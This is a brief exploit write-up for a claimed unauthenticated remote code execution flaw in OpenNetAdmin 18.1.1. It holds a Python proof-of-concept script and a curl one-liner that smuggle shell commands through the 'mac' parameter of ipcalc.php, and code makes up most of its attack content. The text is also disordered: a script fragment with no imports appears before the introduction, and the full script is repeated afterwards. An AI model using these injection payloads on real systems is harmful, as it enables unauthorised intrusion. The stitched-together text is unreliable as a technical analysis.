OpenNetAdmin 18.1.1 Exploit

try:
    r = requests.get(url, params={"mac": payload}, timeout=5)
    print("[+] Payload sent. Check /tmp/ona_test on target.")
except Exception as e:
    print(f"[-] Failed: {e}")

Exploit Analysis & Proof of Concept

1. Introduction

OpenNetAdmin (ONA) is an open-source network management platform providing inventory, DHCP, DNS, and configuration management. Version 18.1.1 (released circa 2018) contains a critical vulnerability allowing unauthenticated remote code execution (RCE). This paper dissects the vulnerability, its root cause, and a working exploit.

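import sys
import requests

target = sys.argv[1].rstrip('/')  # base URL of the target, trailing slash removed
url = f"{target}/ona/ipcalc.php"
payload = "127.0.0.1; echo 'VULN' > /tmp/ona_test;"  # writes a marker file as the test
try:
    r = requests.get(url, params={"mac": payload}, timeout=5)
    print("[+] Payload sent. Check /tmp/ona_test on target.")
except Exception as e:
    print(f"[-] Failed: {e}")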

curl "http://target/ona/ipcalc.php?mac=127.0.0.1;id"
